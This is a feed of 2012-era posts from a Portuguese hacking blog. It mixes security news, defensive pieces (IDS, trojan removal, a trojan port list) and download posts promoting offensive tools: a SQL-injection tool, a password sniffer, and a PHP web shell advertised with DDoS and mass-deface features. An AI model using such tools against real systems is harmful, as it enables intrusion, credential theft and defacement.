O Windows 8, sucessor do Windows 7 esta prestes a ser lançado e já vem chamando a atenção de muitos usuários de informática. Essa nova versão do Windows promete trazer melhorias em questão de desempenho, segurança e portabilidade, para você ter uma idéia, o Windows 8 poderá ser rodado até mesmo em tablets.

Em questão de design o Windows 8 não esta muitoooo diferente do Windows 7, mas por ser um sistema que também pode ser instalado em tablets, o Windows 8 trás aquelas telas típicas de tablets e smartphones, aonde temos vários aplicativos e informações do aparelho, bem grande e animado, essa tela inicial é baseada no “MetroUI” que foi criado inicialmente para o tocador MP3 Zune.

As interfaces gráficas acima são mais indicadas para tablets.

Bom, deixando essa parte de novidades e recursos do novo Windows, para um outro post ou vídeo review, vamos ao que interessa.

Na terça feira passada “13/09“, a Microsoft mostrou detalhes do Windows 8, durante a abertura da conferência Built, em Anaheim na Califórina. Na madrugada de quarta-feira “14/09” a Microsoft lançou uma versão de testes gratuita do Windows 8 para desenvolvedores, que também pode ser baixada por usuários comuns através do Windows Dev Center.

A versão de testes do Windows 8 esta disponível em versões x64 (64bits) e x86 (32bits) ambas em inglês. Para baixar o Windows 8 gratuitamente não é preciso fazer nenhum cadastro, basta acessar o site Windows Dev Center, escolher uma versão do Windows e clicar em “Download” logo abaixo do nome da versão.

Se você esta curioso em saber como é o Windows 8, baixe-o e instale-o em uma maquina virtual, eu recomendo a ultima versão do VirtualBox, se você estiver usando o VMWare Workstation 7, você terá alguns problemas para instalar o Windows 8.

Em breve eu postarei um vídeo review, mostrando desde a instalação do Windows 8 até a utilização do mesmo.

Poderar gostar de;

Source Stuxnet está dispnível na Internet

Sun, 11 Mar 2012 16:52:00 +0200

No ano passado um dos vírus que mais chamou a atenção de profissionais de segurança e até mesmo de vários governos foi o Stuxnet, um vírus extremamente sofisticado, desenvolvido para a Ciberguerra, que atacou as usinas nucleares do Irã. Foi com a descoberta desse malware, que o tema Ciberguerra ganhou mais ênfase nas mídias e nos governos de vários países.

O Stuxnet é um malware projetado para alterar a programação dos PLCs (Programmable Logic Controllers) que são dispositivos computadorizados, que automatizam tarefas industriais como taxa de fluxo regular para manter a pressão e controles de temperatura.

Ainda no ano passado, nós postamos aqui no Mundo Dos Hackers, uma notícia falando sobre uma possível negociação que estava havendo em fóruns hacker, para a aquisição da source (código fonte) do Stuxnet, mais tarde houve vários boatos em que os Estados Unidos e Israel seriam possivelmente os criadores do stuxnet, o que acabou deixando um clima de desconfiança entre os governos do Irã, Israel e EUA.

Um ano depois, quando tudo parecia mais calmo e esquecido, surge uma surpresa para muitas pessoas ou pelo menos para mim, o código fonte do stuxnet esta disponível gratuitamente e publicamente na Internet para fins educacionais, ou seja, qualquer pessoa pode baixa-lo e estuda-lo da forma que quiser.

A source disponível é compilada usando o decompiler Hex-Rays e pode ser baixada através do MultiUpload.

Se você é profissional de segurança e programador C, você poderá aprender muitas coisas com o código fonte do stuxnet, por isso não deixe de estuda-lo. Se você é apenas um curioso, você pode baixa-lo, mas será preciso ter conhecimento em linguagem C para entender o malware.

Um vírus extremamente sofisticado e desconcertantemente perigoso disponível na Internet, o que você acha disso?

Poderar gostar de;

Sistema para monitoramento de rede

Sun, 11 Mar 2012 16:46:00 +0200

Um dos pontos mais importantes quando estamos falando de segurança de um computador é o “monitoramento” dos serviços e processos do mesmo, podemos usar como exemplo o seu computador. Nesse momento o seu computador esta conectado a Internet, vários dados estão entrando e saindo do seu computador sem que você perceba, a questão é quais dados estão entrando e saindo? Qual a sua estrutura de rede? Você tem algum programa (firewall) que filtra esses dados, impedindo que dados maliciosos entrem em seu computador?

Ao monitorar todos ou parte dos dados que entram e saem do seu computador, você garante uma segurança mais forte para o mesmo, aliando isso a um monitoramento da estrutura de rede física e virtual e o monitoramento dos programas instalados em seu computador, a segurança será ainda mais forte.

Como ninguém tem paciência ou tempo para ficar na frente do monitor 24hs por dia, para analisar cada dado que entra e sai do seu computador ou cada processo executado, o jeito é contar com programas que automatizam esses processos, ou seja, ele só irá lhe consultar se algo de errado ou malicioso for encontrado, o bom disso é que existem programas que além de monitorar processos de entrada e saída, eles ainda fazem uma grande parte de tudo que acabei de dizer acima, como monitoramento de componentes físicos da rede e monitoramento de programas e sistemas.

O OSSIM (Open Source Security Information Management) ou Alien Vault Open Source SIEM é sistema Linux com diversas ferramentas voltadas a segurança da informação, que agindo em conjunto, concedem um ambiente incrível para administradores de rede e de sistemas ou usuários comuns, que possibilita um monitoramento detalhado de uma rede.

O bom do OSSIM é que ele conta com uma interface gráfica (GUI) bem simples e objetiva que pode ser acessada através do navegador web de um dos PCs que esteja na rede, o que permite com que o usuário visualize o que quer na hora que quiser, além disso, o OSSIM também pode funcionar como IPS (Intrusion Prevention System), prevenindo sua rede contra intrusos.

Como o próprio nome do sistema já diz, o OSSIM é um sistema gratuito e aberto, para baixa-lo basta acessar o site oficial do projeto. Atualmente o OSSIM esta na versão 3.0 e possui versão 32 bits (x86) e 64 bits (x64), sendo que os desenvolvedores do sistema, recomendam explicitamente a versão 64 bits, por possuir mais recursos e ser a versão que será continuada nos próximos lançamentos, como a versão 4.0 do OSSIM.

Se você é um amante de hacking e segurança da informação, você não pode deixar de testar esse sistema.

Poderar gostar de;

XCode Exploit Scanner

Sat, 10 Mar 2012 18:26:00 +0200

XCode Exploit Scanner

XCode SQLI / LFI / XSS e ferramenta de digitalização WebShell

XCode Exploit - Scanner Vulnurable & WebShell ajudá-lo a recolher o Link dorks do Google.

Você pode verificar os resultados, sua vulnerabilidade para explorar com os comandos SQL injection, LFI, e XSS.

Você pode caçar o webshells aqueles carregados.

Nome: XCode Exploit Scanner

Gênero: Hacker

Tamanho: 1.19 MB

Formato: rar
Tutorial: Em Breve

BAIXAR

Poderar gostar de;

Intercepti - NG nova ferramenta Sniffing

Sat, 10 Mar 2012 18:20:00 +0200

Intercepter-NG Nova Ferramenta Sniffing

[Intercepter-NG] oferece os seguintes recursos:

+ Sniffing senhas \ hashes dos tipos:

ICQ \ IRC \ AIM \ FTP \ IMAP \ POP3 \ SMTP \ LDAP \ BNC \ SOCKS \ HTTP \ WWW \NNTP \ CVS \ TELNET \ MRA \ DC + + \ VNC \ MYSQL \ ORACLE

+ Sniffing mensagens de chat de ICQ \ AIM \ JABBER \ YAHOO \ MSN \ IRC \ MRA

+ Promiscuous-mode \ ARP \ DHCP \ gateway \ Smart Digitalização

+ Modo Raw (com pcap filtro)

+ Modo eXtreme

+ Pacotes Capturar e pós-captura (offline) analisar

+ Tráfego remoto captura via RPCAP daemon

+ NAT

+ ARP MITM

+ DNS sobre ICMP MITM

+ DHCP MITM

+ + SSL SSL MITM Faixa

Funciona em Windows NT (2K \ XP \ 2k3 \ Vista \ 7).

Nome: Intercepter-NG

Gênero: Hacker

Tamanho: 1.47 MB

Formato: rar
Tutorial: YouTube

BAIXAR

Poderar gostar de;

Havij 1.09 (SQL) Injection

Sat, 10 Mar 2012 18:14:00 +0200

Havij 1.09 (SQL Injection)

Havij é uma ferramenta automatizada de injeção SQL que ajuda os hackers a encontrar e explorar vulnerabilidades de injeção SQL em uma página web.

Ele pode tirar proveito de uma aplicação web vulnerável. Ao utilizar, este usuário pode executar software de back-end de impressões digitais do banco de dados, recuperar os usuários DBMS e os hashes de senha, mesas de despejo e colunas, buscar dados do banco de dados, execução de instruções SQL e até mesmo acessar o sistema de arquivos subjacente e executar comandos no sistema operacional.

O poder da Havij que o torna diferente de outras ferramentas semelhantes é os seus métodos de injeção.

A user friendly GUI (Graphical User Interface) e configurações de Havij automatizada e detecções torna fácil de usar para todos, mesmo os usuários amadores.

Nome: Havij

Gênero: Hacker

Tamanho: 1.7 MB

Formato: rar

Tutorial: Em Breve

BAIXAR

Poderar gostar de;

Anti-Shell v1.5 (Final) Lançamento

Sat, 10 Mar 2012 17:45:00 +0200

Ani-Shell v1.5 (Final) LANÇAMENTO

Ani-Shell é uma concha PHP simples com algumas características únicas, como Mass Mailer, A Fuzzer Web Server-simples, um DDoser etc! Esta concha tem imensas capacidades e têm sido escritos com alguns padrões de codificação em mente para melhor edição e personalização.

Características:

Shell
Mass Mailer
DDos
Web-Server Fuzzer
Uploader
Design
Login
Mass Code Injector (Appender and Overwriter)
Encoded Title
Back Connect
Bind Shell
Lock Mode Customisable
Tracebacks (email alerts)
PHP Evaluate
PHP MD5 Cracker
Anti-Crawler
Mass Deface

Nessa nova versão:

Melhor CSS
Gerenciador de Arquivos Inteligente
Auto Rooter
PHP Obfuscater
Google Creator Dork
Zip Downloader (Download de qualquer arquivo ou diretório do servidor web)
Erro fixo da Memória Exausto em MD5 Cracker

login : lionaneesh

pass : lionaneesh

DOWNLOAD

Poderar gostar de;

FBI quer desligar a Internet em 8 de março

Sat, 10 Mar 2012 17:13:00 +0200

FBI quer desligar a Internet em 8 de março

A Internet poderia ir escuro para milhões de usuários já em 8 de março por causa de um vírus que corrompeu computadores em mais de 100 países. No ano passado, as autoridades da Estónia apreendidos seis homens acreditavam responsável pela criação de um script de computador malicioso chamado de Trojan DNSChanger. Uma vez solto na Web, o worm corrompido computadores em mais de 100 países, incluindo uma estimativa de 500.000 só nos EUA.

O principal impacto desta infecção é que causou os internautas para ser enviado para sites fraudulentos, alterando o que se chama as configurações de DNS comprometido Sistema computers.The de Nome de Domínio (DNS) é a espinha dorsal do esquema da internet endereço e os servidores DNS são especiais computadores em todo o mundo que agem como guardas de trânsito de Internet fornecendo indicações para sites que você deseja visitar.

Embora o FBI fechou a rede DNSChanger e colocar servidores substitutos, que alertou a solução era apenas temporária - eo prazo judicial é 8 de março. Quando o FBI, este grupo apertado, se tivessem desligado o ladino servidores DNS, todo mundo que estava infectado teria sido imediatamente cortado da Internet para que o FBI escolheu um strategy.They diferente decidido a obter uma ordem judicial que lhes permita substituir o servidores desonestos DNS com legítimo stand-ins para que todos os computadores infectados não ficar cortada sem aviso dando-lhes tempo para passar a palavra.

Ambos os usuários do Windows e MacOS estão em risco para essa infecção, porque ele explora seu navegador, não o seu sistema operacional. Se você é um pouco técnico, você pode fazer uma verificação automática de seu computador para se certificar que você não está infectado, comparando DNS do computador de configuração para a lista de desonestos servidores DNS:

85.255.112.0 através de 85.255.127.255

67.210.0.0 através 67.210.15.255

93.188.160.0 através de 93.188.167.255

77.67.83.0 através 77.67.83.255

213.109.64.0 através 213.109.79.255

64.28.176.0 através 64.28.191.25

O FBI publicou um guia bastante decente para realizar o auto-check aqui. Se você está infectado pelo Trojan DNSChanger, o FBI nos lembra que este malware também desabilita as atualizações de segurança que poderia ter mais expostas que você outro malware.

Poderar gostar de;

Site da Rede Globo fica inacessivel durante alguns minutos

Sat, 10 Mar 2012 17:09:00 +0200

Site da Rede Globo fica inacessível durante alguns minutos

O site da Rede Globo (http://www.globo.com/) ficou alguns minutos fora do ar neste dia 25/02/2012.

O grupo chamado @PiratesBrasil dizem serem os responsáveis pela inatividade do site, mas nada foi confirmado pela emissora, até o momento.

Poderar gostar de;

Banco de dados da NASA vazado por r00tw0rm

Sat, 10 Mar 2012 16:51:00 +0200

Banco de dados da NASA vazado por r00tw0rm

Hackers de r00tw0rm equipe novamente bateu NASA. Segundo o último tweet de hackers, eles pretendem cortar o um dos Sudomain da Nasa (Link não está exposto por hackers e afirmou ser reportados por Fix).

Hackers alegam que cortar GB de banco de dados e eles vazaram amostra de banco de dados incluem nomes de usuários e senhas, e-mails, entre em contato, como mostrado:

Ontem mesmo hack Hackers e expor o banco de dados da United States Census Bureau e link Vulnerável também foi exposto.

Poderar gostar de;

Scanner Retina Commuty

Sat, 10 Mar 2012 13:43:00 +0200

Uma das ferramentas mais requisitadas e usadas por hackers e crackers em testes de invasão e invasões são os scanners, com eles é possível fazer uma varredura parcial ou completa de um ou mais computadores conectados a rede, e obter diversas informações de possíveis vulnerabilidades como: portas abertas indevidamente, programas e/ou sistema operacional desatualizados, serviços rodando indevidamente, dentre outras falhas.

Hoje em dia existem diversos scanners, alguns são bem simples e apenas informam quais portas estão abertas em um determinado computador, já outros são robustos e informam até problemas de configurações e falta de patches em programas e/ou no sistema operacional do computador.

As vantagens dos scanners mais simples estão relacionadas a velocidade e praticidade, isso é muito útil em casos de testes de invasão superficiais ou básicos. Já as vantagens dos scanners mais completos, estão relacionadas a diversidade de informações que eles retornam e a diversidade de testes, que eles podem fazer junto ao scanneamento básico, a verdade é que cada scanner serve para um determinado momento.

O Retina Community é um scanner de vulnerabilidades gratuito para até 32 IPs, com diversos recursos e bem rápido, ele é ótimo para hackers e crackers ou até mesmo para empresas e organizações que não podem investir muito com segurança e TI.

No caso de um hacker ou cracker, o mesmo pode utilizar o Retina para obter diversas informações do computador alvo, para que possa a partir dai traçar o plano de invasão. Já no caso de empresas e organizações, o administrador da rede ou responsável pela segurança dos computadores, pode simplesmente escanear os computadores da rede e obter um relatório completo das vulnerabilidades, dessa forma, ele pode fazer a segurança dos computadores e da rede ou contratar um hacker para tentar penetrar a falha, e ver até onde ela vai e o quanto ela pode prejudicar a empresa, se já não prejudicou, além disso é claro, corrigir os erros e reforçar a segurança.

Dentre as funcionalidades do Retina Community estão:

- Avaliação das vulnerabilidades em sistemas operacionais, aplicações, dispositivos e ambientes virtuais

- Identificação de vulnerabilidades 0-day (zero-day)

- SCAP configuração de digitalização

- Atualizações de vulnerabilidades integrado e alerta

- Relatórios de vulnerabilidades detalhados a nível executivo

- Suporte on-line e recursos da equipe de pesquisa da eEye

O Retina Community é um scanner para a familia Windows (7/ Vista/ 2008/ XP/ 2000), ele pode ser baixado gratuitamente através do site oficial dos desenvolvedores.

Poderar gostar de;

Pen test

Sat, 10 Mar 2012 13:22:00 +0200

PenTest como todos já devem saber significa teste de penetração (sem trocadilho) ou teste de invasão, aonde o hacker ou cracker faz diversos testes em uma rede ou em um sistema procurando por vulnerabilidades que possibilitem um ataque. Hoje existem diversas ferramentas e scripts que automatizam e facilitam a vida do Hacker na hora do pentest, essas ferramentas conseguem fazer varreduras no sistema ou na rede, e ao término elas exibem informações sobre a mesma.

Quem vem acompanhando o Mundo Dos Hackers, já deve ter se deparado com alguma noticia ou matéria falando sobre Sistemas Operacionais Hacker, voltados para pentests e até mesmo kits de aplicativos voltados para pentests que podem ser rodados no iOS, sistema operacional do iPhone, iPad e iPod Touch. O que poucos sabem é que as ferramentas para pentests não se limitam aos softwares, hoje em dia existem hardwares que podem ser usados para pentests e invasões avançadas, e é isso que veremos agora.

O site PenTestIT criou uma lista com todos os dispositivos que eles encontraram, que podem ser usados para pentests, a maioria desses dispositivos não foram criados para essa finalidade, mas como todos já sabem, nada tem finalidade única . A lista é bem interessante e vale a pena dar uma conferida.

Obs: Para aumentar a imagem clique sobre a mesma.

1. DigiConnect ME

Esse dispositivo mede 0,75 x 0,75 x 1,4 polegadas e pesa apenas 18 gramas, ele é nada mais nada menos que uma porta RJ-45. Ai você me pergunta “Ta e o que eu faço com isso?“. – Olhe mais perto do dispositivo, pense em momentos que você tem acesso a uma placa e precisa apenas de uma entrada RJ-45 para fazer uma invasão.

2. DigiConnect Wi-ME

Esse dispositivo é a versão Wi-fi do dispositivo anterior, ele inclui uma antena SMA-RO. As suas aplicações em pentest são as mesmas do dispositivo acima, possibilita que o hacker crie uma entrada wi-fi em uma placa.

3. SheevaPlug

Esse dispositivo é um pequeno servidor de baixa potência, voltado para redes baseadas em serviços domésticos como compartilhamento de arquivos, conexão de gadgets como celulares, roteador, ponto de acesso, etc . Em pentest esse dispositivo pode ser usado para criar um servidor de acesso pessoal, para chamar a atenção de pessoas ao redor.

4. VIA ARTIGO A1100

Esse dispositivo é praticamente um mini-computador, ele possui placa de vídeo HD com entrada HDMI, placa de som, porta USB e Wireless, tudo isso sendo processado por um processador de 1.2Ghz VIA Naano. As suas aplicações comuns são muitas, todas resumem-se praticamente em seus recursos de mídia, podendo então ser usado como streaming de mídia. Em pentest esse dispositivo pode ser usado como um streaming de vigilância, ou algo do tipo.

5. PWN Plug

Esse sim é um dispositivo que foi criado já pensando em pentesting. Esse dispositivo é como se fosse um mini-computador rodando Ubuntu, já equipado com diversas ferramentas hacker como: Metasploit, fasttrack, SET SSLstrip, nmap dsniff, netcat, Nikto, nbtscan, XProbe2, inguma, Scapy, ettercap, medusa JTR, dentre outros. Para usa-lo basta liga-lo na tomada e conectar um computador ou dispositivo USB.

6. PlugBot

Esse dispositivo não foi lançado ainda, porém ainda em projeto já vem chamando a atenção. Ele é parecido com o dispositivo anterior, possui processador de 1.2 Ghz, bluetooth, wireless e Ethernet, ele também vem com Linux instalado + Perl + PHP + MySQL e é claro algumas ferramentas hacker para pentests.

Esses são os dispositivos voltados ou que podem ser voltados para pentests, eu dei uma resumida nas descrições e não abordei muitos termos técnicos porque não vem ao caso pelo menos agora. Caso você queira obter maiores informações sobre os dispositivos acesse a lista oficial do PenTestIT.

Obs: Na lista do PenTestIT ainda esta incluso o celular Nokia N900, mas eu vou deixar para falar dele em outro artigo, um que aborde smartphones e aplicativos para pentests.

Como vocês puderam ver além de softwares, sistemas operacionais e aplicativos voltados para pentests, um hacker pode contar também com dispositivos físicos (hardware) para fazer um pentest, o que facilita e muito a ação do hacker, já que andar com um notebook na mão pode de certa forma despertar suspeitas .

Poderar gostar de;

XSSF

Sat, 10 Mar 2012 13:16:00 +0200

O XSSF é uma ferramenta voltada para pentests (testes de invasão) com foco em vulnerabilidades do tipo XSS (Cross-Site Scripting), o seu propósito é tornar o processo de exploração desse tipo falha mais fácil e rápido.

Com o XSSF você consegue testar aplicações web, sites e até mesmo navegadores, em busca de vulnerabilidades XSS, se for encontrado alguma falha , você ainda pode tentar fazer a invasão utilizando exploits prontos ou criados por você.

Um ponto forte do XSSF é que ele é integrado ao Metasploit, dessa forma você pode utilizar módulos MSF (Metasploit Framework), além disso ele fornece uma poderosa API documentada, facilitando o desenvolvimento de novos módulos e ataques.

A instalação do XSSF é bemmm simples:

1- Como o XSSF se integra ao Metasploit, antes de tudo você precisa ter o próprio metasploit instalado em seu SO (Linux, MAC ou Windows), por isso baixe e instale o Metasploit. Com o Metasploit instalado, atualize o Ruby para a versão 1.9 (caso esteja com uma versão anterior).

2- Baixe o XSSF diretamente de sua página oficial no Google Code. Após o download, descompacte-o e copie todos os arquivos para a pasta do Metasploit (/msf3/), esta pasta esta localizada no diretório aonde todos os programas são instalados. Feito isso basta utilizar o XSSF.

Na página do XSSF você ainda encontra alguns vídeos aonde é mostrado o XSSF em ação, veja abaixo um deles:

No vídeo acima o atacante explorar uma vulnerabilidade XSS e consegue invadir um aparelho com o sistema operacional Android.

Para obter mais informações sobre o XSSF acesse o seu Google Code.

Poderar gostar de;

Network Miner

Sat, 10 Mar 2012 13:07:00 +0200

Descrição:

O NetworkMiner é uma ferramenta para Analise Forense de Redes (NFAT) que também pode ser usada por hackers, com ele você pode detectar o sistema operacional, hostname (nome da maquina) e quais portas estão abertas em um computador da rede.

Com o NetworkMiner, você ainda consegue capturar pacotes e informações que estão trafegando na rede, fazendo então o papel de uma ferramenta passiva de rastreamento e captura de pacotes, ou mais conhecido como “Sniffer“.

Podemos comparar o NetworkMiner como um scanner aliado a um potente sniffer.

Funcionalidades:

As funcionalidades do NetworkMiner resumem-se a Scanning e Sniffing, então vamos nos aprofundar nessas duas técnicas e ver o que essa ferramenta nos oferece:

- Suporte para Per-Packet cabeçalho da informação (WTAP_ENCAP_PPI) como o utilizado pelo Kismet e pelo Wireshark.

- Extração de Facebook, mensagens do Twitter e e-mails enviados com o Microsoft Hotmail.

- Extração de senhas do Twitter de quando as configurações são alteradas.

- Extração de usernames do Facebook da vítima (sem senha).

- Extração de GmailChat, parâmetros de cookies para identificar usuários através de suas contas de login do Google.

Como eu disse, além de ser usado para fins forense, o NetworkMiner também pode ser usado por um hacker para fins de invasão ou segurança .

Imagens:

O NetworkMiner é um software livre e opensource voltado para Windows, você pode baixa-lo no SourceForge.

Sendo para fins hacker ou não, eu recomendo que todos testem o NetworMiner, para ter uma noção de como esses tipos de programas funcionam, afinal não custa nada testar .

Poderar gostar de;

Scanner Nmap

Sat, 10 Mar 2012 12:54:00 +0200

Scanner Nmap

O Nmap ou “Network Mapper” é um software livre do tipo scanner avançado, que foi desenvolvido pelo Gordon Lyon, mais conhecido como Hacker “Fyodor“.

Hoje o Nmap é muito utilizado por hackers, crackers e pentesters, com ele além de fazer um port scan (ver quais portas estão abertas), você também pode obter diversas informações dos hosts (computadores), que estão conectados a uma rede de pequeno, médio ou grande porte, dentre essas informações estão:

IP do computador

MAC do computador

Sistema operacional que esta sendo rodado

Serviços que estão sendo rodados

Portas que estão abertas

Filtros de pacotes que estão sendo usados (firewall e afins)

Dentre outras informações.

O Nmap é usado via shell?

O Nmap é uma ferramenta que pode ser usada no modo shell ou no modo gráfico. A diferença entre esses dois modos é que o através da shell você pode fazer suas combinações e complementos de scan com mais liberdade, já no modo gráfico você só pode usar as o que o programa lhe oferece, porém, você pode desfrutar do ambiente agradável e intuitivo que é o Zenmap, o que é ótimo para usuários iniciantes.

Como o Nmap é?

Veja abaixo alguns print screens do Nmap sendo rodado através da shell no Linux e no modo gráfico no Windows:

Modo Shell – BackTrack 4 RC1

Modo gráfico – Windows XP SP2

Resultado detalhado e amigável:

O Nmap roda em quais sistemas operacionais?

Uma das vantagens do Nmap é que ele possui versões estáveis, para os três principais sistemas operacionais (Linux, MAC OS X e Windows). Particularmente eu prefiro utilizar o nmap no Linux, através da shell, mas no caso de usuários iniciantes, a principio, o melhor é optar pela versão para Windows e usar o modo gráfico.

O Nmap é o melhor de todos os scanners?

Cada scanner ou a maioria deles, possuem funções distintas, além da principal que é procurar por hosts e ver as portas que estão abertas, por tanto, pode existir funções em outros scanners que no Nmap não tem, como também tem funções no Nmap que em outros scanners não tem, o melhor mesmo é conhecer o máximo de scanners que você puder e decidir você mesmo qual é o melhor para a tarefa em questão.

Aonde posso baixar o Nmap?

Como foi dito no inicio desse post, o Nmap é um software livre, logo pode ser baixado gratuitamente. Você pode baixar o Nmap no site oficial do projeto, la você encontrará as versões para todos os sistemas operacionais suportados, além de encontrar também alguns guias, documentação e matérias sobre o nmap, vale a pena dar uma vasculhada.

Poderar gostar de;

Detecção de Intrusos

Sat, 10 Mar 2012 11:26:00 +0200

Detecção de Intrusos

Recentemente, analisei alguns aspectos de segurança de sistemas de detecção de intrusão (IDS) baseados em observação de tráfego de rede. Observei que embora os sistemas de IDS via rede sejam bastante interessantes para detectar possíveis intrusões, estes sistemas possuem limitações que, caso não sejam endereçadas adequadamente, podem comprometer a funcionalidade dos mesmos.

Comparando com o modelo baseado em rede, onde um dispositivo fica "ouvindo" todo o tráfego de rede, o modelo de host é baseado no uso de agentes. De uma forma geral, todos eles possuem um pequeno programa (agente), instalado no sistema que se quer proteger. Este agente é responsável por analisar, o mais rapidamente possível, vários indicadores do sistema, como logs, níveis de uso de CPU, que usuários estão conectados, etc... Com base nas suas regras pré-programadas (sejam elas baseadas em assinatura ou perfis, ou ambos), o agente decide gerar ou não alarmes. Caso o alarme seja gerado, ele freqüentemente é enviado a um servidor central (chamado de "gerente") que pode tomar outras ações adicionais (chamar o operador por pager, gerar log, etc...).

O tipo de informações que um agente pode monitorar, o grau de sofisticação com o qual ele monitora essas informações e que tipo de ação ele pode tomar variam de sistema para sistema. No geral, todos eles permitem monitorar:

Logs do sistema operacional. No caso de Windows NT, os diversos EventLog. No caso de Unix, o log controlado pelo syslog. Nesses logs são armazenados eventos básicos, como auditoria de arquivos, logins bem sucedidos ou não, início e término de programas, entre outros.

Contadores ou indicadores do sistema. Nesse caso, são monitorados aspectos como consumo de CPU (via Performance Monitor do NT ou sar do Unix), espaço disponível em disco e consumo de memória, entre outros. Embora sejam dados não diretamente relacionados à segurança, uma mudança nestes parâmetros pode indicar que algo mudou significativamente. Como exemplo, caso um servidor esteja sendo utilizado indevidamente para tentar quebrar senhas (com programas como L0phtcrack ou Crack, por exemplo) o consumo de CPU poderá ser notadamente maior.

Alguns outros sistemas de detecção de intrusão via host também permitem a monitoração de outros logs, especificados pelo usuário. Nesse caso, podem ser monitorados os logs de programas que, por um motivo ou outro, não usam os logs do sistema. Nessa categoria podemos incluir sistemas de banco de dados, servidores de autenticação (como Radius/Tacacs), servidores Web, entre outros. Nesses casos, o agente deve ser "treinado" em o que deve ser analisado do log.

Com todas essas características, os IDS baseados em host acabam por oferecer vantagens significativas para o implementador de IDS. A principal delas é que a qualidade da informação coletada. Como o log a ser gerado pela aplicação pode ser o resultado de uma longa transação, por exemplo, é possível detectar ataques ou situações que uma análise dos pacotes individuais não mostraria.

Outra vantagem do modelo de IDS de host é que, como o agente é especializado para um determinado sistema operacional, ele pode inspecionar características desse sistema não acessíveis via rede. Existem diversas vulnerabilidades conhecidas, tanto em Unix como em NT, que só podem ser exploradas por usuários locais. É comum que indicadores dessas vulnerabilidades (ou de tentativas de exploração delas) não sejam percebidas por quem está "fora" do sistema, como um IDS de rede.

Por outro lado, é importante conhecermos as limitações dos IDS de host.

Em primeiro lugar, um IDS de host é significativamente mais trabalhoso de implementar, pois necessita agentes em todos os equipamentos a serem protegidos. Se estamos falando de 200, 300 servidores, pode ser um impacto grande ter que instalar e configurar agentes em todos eles.

Outro problema com IDS de host é a não existência de um agente para o sistema operacional em questão. São poucos os produtos que possuem suporte a uma gama variada de sistemas operacionais. A maioria tende a suportar Windows (mesmo assim quase sempre somente NT), Solaris e talvez outro tipo de Unix, como HP-UX, AIX ou Linux. De que adianta um IDS que não suporta a plataforma desejada?

Outro ponto a ser observado diz respeito à qualidade da informação inicial. Caso os logs observados pelo IDS não indiquem os eventos desejados em um grau de detalhe adequado, o IDS não pode extrair nada dali. No caso de um sistema que inspecione o syslog de Unix, por exemplo, não podemos detectar possíveis incidentes com o daemon de DNS (ou de FTP) se o mesmo não foi configurado para gerar logs no syslog (ou se o IDS não foi configurado para coletar os logs em outro lugar).

Finalmente, outro ponto diz respeito à segurança do próprio daemon (ou serviço) do IDS. Como o IDS roda no próprio sistema, caso um atacante consiga obter acesso privilegiado (root/Administrator) ele pode desabilitar o agente do IDS. Caso não exista nenhum mecanismo de checagem periódica, a intrusão poderá não ser detectada.

Ao final de nossa análise técnica sobre IDS, espero que tenha ficado claro que um sistema de detecção de intrusão pode ser um excelente acréscimo ao conjunto de mecanismos de segurança da organização. Um IDS pode indicar atividades suspeitas no ambiente, levando a equipe de segurança a identificar uma intrusão ou uma tentativa de intrusão. Ou seja, no final das contas, ainda há muito trabalho a ser feito depois de instalado os mecanismos de detecção de intrusão.

Poderar gostar de;

Removendo Socket's 2.0

Sat, 10 Mar 2012 03:39:00 +0200

Removendo Socket's 2.0

Sockets de Troie 2.0

Funcionamento:

Este tipo de trojan é composto por dois programas o servidor que precisa estar rodando no
computador da vítima e o cliente que pode ser qualquer outro micro com o sockets.

O servidor é dado como um verdadeiro Cavalo de Tróia, vc pode recebe-lo com nomes sugestivos como: Tiazinha.exe ou Teens.exe ou algo do tipo. Via e-mail. Por isso que todos falam para não executar programas em que a fonte não seja extremamente confiavel. Mesmo assim tem alguns que usam seus melhores amigos como cobaias para esse tipo de teste.

E se vc cair nessa executando o arquivo... Gotcha!

As portas (5000) de seu micro ficaram sempre abertas para quem tiver e Sockets...

Dai em diante sua vida na Net nao sera das melhores, vc vera seu Cd-Player abrir e fechar sozinho, ouvira sons estranhos, isso com os "bonzinhos" pois se quem te invadir estiver inspirado pode ate excluir todos seus arquivos, e dai pra mais...

Removendo o Sockets:

Quando o Sockets de Troie 2.0 "infecta" um micro ele se auto-copia 3 vezes com nomes diferentes. E para outros diretórios:

c:\windows\rsrcload.exe
c:\windows\system\mgadeskdll.exe
c:\windows\system\csmctrl32.exe

Para vc remove-lo, pressione Ctrl+Alt+Del então procure algum desses 3 arquivos e de Finalizar Tarefa para fecha-lo. Agora é so ir nos diretórios onde estão os arquivos e exclui-los. Com isso vc já esta mais seguro.

Caso vc queira fazer uma limpeza completa entre no RegEdit e exclua essas chaves :

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
Load Mgadeskdll = C:\WINDOWS\SYSTEM\Mgadeskdll.exe

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run
Load Rsrcload = C:\WINDOWS\Rsrcload.exe

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\RunServices
Load Csmctrl32 = C:\WINDOWS\SYSTEM\Csmctrl32.exe

Agora é so tomar cuidado para não executar novamente o arquivo que provavelmente vc recebeu via e-mail e pensava que era um jogo...

Poderar gostar de;

Lista de Portas

Sat, 10 Mar 2012 03:35:00 +0200

Esta lista é útil para aquelas pessoas que estão infectadas com algum trojan e não sabem qual seu nome, bastando apenas saber em qual porta ele está agindo.

Abaixo está a lista das portas-padrão utilizadas pelos trojans mais conhecidos para Windows NT, 95, 98:

Porta     21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
Porta     23 - Tiny Telnet Server
Porta     25 - Antigen, Email Password Sender, Haebu Coceda, Terminator, Shtrilitz Stealth, WinPC, WinSpy
Porta     31 - Hackers Paradise, Master's Paradise 8
Porta    121 - BO jammerkillahV
Porta    456 - Hackers Paradise
Porta    555 - Ini-Killer, Phase Zero, Stealth Spy
Porta    666 - Satanz Backdoor, Attack FTP
Porta   1001 - Silencer, WebEx
Porta   1011 - Doly Trojan
Porta   1033 - NetSpy
Porta   1080 - Wingate (Socks-Proxy)
Porta   1170 - Psyber Stream Server, Voice, Streaming Audio Trojan
Porta   1234 - Ultors Trojan
Porta   1243 - SubSeven
Porta   1245 - VooDoo Doll
Porta   1492 - FTP99CMP
Porta   1509 - Psyber Streaming Server
Porta   1600 - Shivka-Burka
Porta   1807 - SpySender
Porta   1981 - Shockrave
Porta   1999 - BackDoor
Porta   2001 - Trojan Cow
Porta   2023 - Ripper
Porta   2115 - Bugs
